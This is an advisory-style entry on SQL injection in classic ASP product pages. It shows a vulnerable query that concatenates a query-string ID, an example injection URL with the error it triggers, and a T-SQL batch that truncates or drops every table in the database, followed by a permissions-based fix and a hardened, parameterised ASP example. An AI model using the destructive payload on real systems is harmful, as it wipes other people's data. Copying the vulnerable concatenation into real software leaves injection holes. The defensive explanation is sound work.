COMMAND
asp (?)
SYSTEMS AFFECTED
ASP/SQL
PROBLEM
Steve Wilding posted the following. A bug that he has been
experimenting with is that many websites, when fetching products
from the database, don't verify the data before passing it into
SQL:
Sql = "SELECT * FROM Products WHERE ProductID=" & Request.QueryString("ID")
They are assuming that "ID" will be a number and allow SQL to
execute it. Therefore a URL like
http://www.someserver.com/products.asp?ID=(SELECT+*+FROM+TableX)
would generate this error
Microsoft OLE DB Provider for ODBC Drivers error '80040e37'
[Microsoft][ODBC SQL Server Driver][SQL Server]Invalid object name 'TABLEX'
/products.asp, line 11
This means that SQL executed the command "SELECT * FROM TableX".
Now what do you suppose would happen if you were to pass this
into SQL via a QueryString?
DECLARE @TableName varchar(100)
DECLARE Tables CURSOR FOR
SELECT Name FROM SysObjects WHERE xType = 'U'
OPEN Tables
FETCH NEXT FROM Tables Into @TableName
WHILE @@FETCH_STATUS = 0
BEGIN
Exec ('Truncate Table ' + @TableName)
FETCH NEXT FROM Tables
END
CLOSE Tables
DEALLOCATE Tables
EVERY TABLE IN THE DATABASE WOULD BE TRUNCATED! Change "Truncate"
to "Drop" and every table would be deleted, if permissions are
not properly set.
SOLUTION
This is in reality not a bug, but something that happened due to
bad permissions being applied. Setting correct permissions will make
this problem disappear.
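Alongside the permissions fix, the query shown above can be written so that the ID never reaches SQL Server as code. The following is an added example, not code from the original post: a classic ASP version that rejects any ID that is not a plain integer and then binds it as a typed parameter through ADODB.Command. It assumes an already-open ADODB.Connection object named conn and a Products column named ProductName.

```vbscript
<%
' Added example, not from the original post. Assumes an open
' ADODB.Connection named conn (connection string omitted) and a
' ProductName column in Products. Hardened form of:
'   Sql = "SELECT * FROM Products WHERE ProductID=" & Request.QueryString("ID")

Dim rawId, productId, re
rawId = Request.QueryString("ID")

' 1. Validate: accept only 1-9 decimal digits. Anything else, such as
'    "(SELECT * FROM TableX)" or a batch of T-SQL, is refused before
'    any database call is made.
Set re = New RegExp
re.Pattern = "^\d{1,9}$"
If Not re.Test(rawId) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid product id"
    Response.End
End If
productId = CLng(rawId)

' 2. Parameterise: the value is bound as an integer parameter, never
'    concatenated into the SQL text, so the query shape cannot change.
Dim cmd, rs
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "SELECT * FROM Products WHERE ProductID = ?"
cmd.CommandType = 1                                ' adCmdText
' Numeric constants from adovbs.inc: adInteger = 3, adParamInput = 1
cmd.Parameters.Append cmd.CreateParameter("ID", 3, 1, , productId)
Set rs = cmd.Execute

If Not rs.EOF Then
    ' Encode output so a stored value cannot inject HTML into the page
    Response.Write Server.HTMLEncode(rs("ProductName"))
End If
rs.Close
Set rs = Nothing
Set cmd = Nothing
%>
```

With this in place the error page from the original post no longer appears for a malformed ID, and a login with restricted permissions remains a second line of defence rather than the only one.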